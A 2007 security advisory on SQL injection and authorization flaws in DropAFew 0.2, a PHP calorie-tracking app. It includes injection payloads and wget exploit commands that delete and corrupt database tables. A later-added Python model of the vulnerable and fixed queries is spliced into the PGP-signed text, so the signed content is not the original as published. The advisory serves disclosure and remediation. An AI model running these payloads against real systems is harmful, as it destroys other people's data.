AKLINK-SA-2007-002.txt
Posted Apr 11, 2007
Authored by Alexander Klink | Site cynops.de

DropAFew versions 0.2 and below suffer from SQL injection vulnerabilities.

tags | exploit, vulnerability, sql injection
advisories | CVE-2007-1363, CVE-2007-1364
SHA-256 | d70a0ebccd74c188c38dd1d78303d396a7e2aa349786b47a134cca14004840c7

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

============================================
||| Security Advisory AKLINK-SA-2007-002 |||
||| CVE-2007-1363 (CVE candidate) |||
||| CVE-2007-1364 (CVE candidate) |||
============================================

DropAFew - Multiple vulnerabilities (SQL injection, authorization issue)
========================================================================

Date released: 10.04.2007
Date reported: 07.03.2007
$Revision: 1.1 $

by Alexander Klink
Cynops GmbH
a.klink@cynops.de
https://www.cynops.de/advisories/CVE-2007-1363.txt
(S/MIME signed: https://www.cynops.de/advisories/CVE-2007-1363-signed.txt)
https://www.klink.name/security/aklink-sa-2007-002-dropafew-sqlinjection.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1363
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1364

Vendor: Chris Bratlien (Open Source)
Product: DropAFew - a multi-user calorie counting program using PHP
Website: http://www.dropafew.com
Vulnerability: SQL injection attack, authorization issues
Class: remote
Status: patched
Severity: moderate (database corruption and some information disclosure)
Releases known to be affected: 0.2
Releases known NOT to be affected: 0.2.1

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

SQL injection is possible in several places and may lead to the
deletion or corruption of the two most important database tables of
the application.
The injections work without query stacking and with magic_quotes_gpc
set to on: the injected values are used in numeric context, so no
quote character is needed and quote escaping does not help.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

An SQL injection is present in search.php and search-pda.php in the
delete action. Setting id to, for example, "1 OR id > 0 --" deletes the
foodfacts table contents completely.
In editlogcal.php, the save action allows an SQL injection into
an UPDATE statement via the calories variable. Setting calories to,
for example, "1000 WHERE id > 0 /*" corrupts the logcal table by
rewriting every row to the same entry (so it looks like everybody keeps
eating the same thing again and again).
Also in editlogcal.php, the id parameter is not checked for authorization,
so a user can view the logged calories of all users (without learning
who ate what, though).
Furthermore, links.php allows a user to add publicly viewable links to
everyone's link page, which other users cannot remove; this could be
abused for spam.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit:

# create new user
wget --save-cookies cookies --keep-session-cookies --post-data='username=exploit&password=1&password_confirm=1' http://[target]/calorie/newaccount2.php
# delete foodfacts table
wget --load-cookies cookies --post-data='id=1%20OR%20id%20>%200--&action=del' http://[target]/calorie/search.php
# make everyone have eaten 1000 strawberries, but hey, they were only 10
# calories ...
wget --load-cookies cookies --post-data='action=save&id=1&date=20070101&time=23232323&vendor=nature&item=strawberries&portion=1000&calories=10+WHERE+id+%3E+0+%2F*' http://[target]/calorie/editlogcal.php
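The following is an added, self-contained model of the two injection points and of the missing ownership check, written for this edit; it is not DropAFew's code and not part of the original advisory. It uses an in-memory SQLite database with an assumed schema (the real application used MySQL, and the column names, in particular the "user" column, are assumptions), emulates magic_quotes_gpc with a small helper, and places the hardened, parameterized form beside each vulnerable query. Sample rows are constructed for the demonstration.

```python
import sqlite3


def magic_quotes_gpc(value):
    """Emulate PHP's magic_quotes_gpc: backslash-escape quotes, backslashes and NUL.
    Digits, spaces, comparison operators and SQL comment markers pass through
    untouched, which is why the option does not help in a numeric context."""
    return (value.replace("\\", "\\\\").replace("'", "\\'")
                 .replace('"', '\\"').replace("\x00", "\\0"))


def fresh_db():
    """In-memory SQLite database with constructed sample rows (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE foodfacts (id INTEGER PRIMARY KEY, item TEXT, calories INTEGER);
        CREATE TABLE logcal (id INTEGER PRIMARY KEY, user TEXT, item TEXT,
                             portion INTEGER, calories INTEGER);
        INSERT INTO foodfacts VALUES (1, 'apple', 52), (2, 'banana', 89),
                                     (3, 'strawberries', 10);
        INSERT INTO logcal VALUES (1, 'alice', 'apple', 1, 52),
                                  (2, 'bob', 'banana', 2, 178),
                                  (3, 'carol', 'apple', 3, 156);
    """)
    return db


def vulnerable_delete(db, raw_id):
    """Model of the search.php 'del' action: id is interpolated unquoted, so
    "1 OR id > 0 --" widens the WHERE clause inside a single statement (no
    query stacking needed). Returns the number of foodfacts rows left."""
    sql = "DELETE FROM foodfacts WHERE id = %s" % magic_quotes_gpc(raw_id)
    db.execute(sql)
    db.commit()
    return db.execute("SELECT COUNT(*) FROM foodfacts").fetchone()[0]


def vulnerable_update(db, raw_calories, row_id):
    """Model of the editlogcal.php 'save' action with the item and portion from
    the advisory's exploit. calories is interpolated unquoted, so
    "10 WHERE id > 0 /*" supplies its own WHERE clause and comments out the
    real one. Returns (item, portion, calories) for every logcal row."""
    sql = ("UPDATE logcal SET item = 'strawberries', portion = 1000, calories = %s "
           "WHERE id = %d" % (magic_quotes_gpc(raw_calories), row_id))
    db.execute(sql)
    db.commit()
    return db.execute("SELECT item, portion, calories FROM logcal ORDER BY id").fetchall()


def safe_delete(db, raw_id):
    """Hardened form: coerce id to int (rejects "1 OR id > 0 --" with a
    ValueError) and bind it as a parameter. Returns rows left in foodfacts."""
    db.execute("DELETE FROM foodfacts WHERE id = ?", (int(raw_id),))
    db.commit()
    return db.execute("SELECT COUNT(*) FROM foodfacts").fetchone()[0]


def safe_update(db, user, raw_id, item, raw_portion, raw_calories):
    """Hardened form: bound parameters close the injection, and the ownership
    check (assumed 'user' column) closes the authorization issue, so a user can
    only rewrite their own log entries. Returns the number of rows changed."""
    cur = db.execute(
        "UPDATE logcal SET item = ?, portion = ?, calories = ? "
        "WHERE id = ? AND user = ?",
        (item, int(raw_portion), int(raw_calories), int(raw_id), user))
    db.commit()
    return cur.rowcount


if __name__ == "__main__":
    print("foodfacts rows after injected delete:",
          vulnerable_delete(fresh_db(), "1 OR id > 0 --"))
    print("logcal rows after injected update:",
          vulnerable_update(fresh_db(), "10 WHERE id > 0 /*", 1))
    print("rows bob may change for id 1:",
          safe_update(fresh_db(), "bob", "1", "strawberries", "1000", "10"))
```

Both injected strings contain no quote character, which is the whole point of the magic_quotes_gpc remark in the overview; the fix is to stop building SQL from strings at all, and an integer coercion before binding gives a clear error instead of a silently widened WHERE clause.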

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Workaround:

Filter the requests, or restrict access to the application to
trusted users only.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

* 07.03.2007: Problem reported to author
* 07.03.2007: Vendor replies and confirms the problem, presents ideas
for a solution
* 03.04.2007: Contacted vendor to check back on status
* 03.04.2007: Vendor responds with updated version 0.2.1

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

Update to version 0.2.1 (http://dropafew.com/download/dropafew-0.2.1.zip)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credit:

Alexander Klink, Cynops GmbH (discovery and exploit development)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFGGqWp8Q3kKmNSxUURAoaKAKCWPDyFVZnZnw7J6DCr4PXp/hwFMACggEos
UR4k+AOgSkfFGL8HYIBoyjY=
=nelw
-----END PGP SIGNATURE-----

--
Dipl.-Math. Alexander Klink | IT-Security Engineer | a.klink@cynops.de
mobile: +49 (0)178 2121703 | Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
HRB 7833, Amtsgericht | USt-Id: DE 213094986 | Geschäftsführer:
Bad Homburg v. d. Höhe | | Martin Bartosch
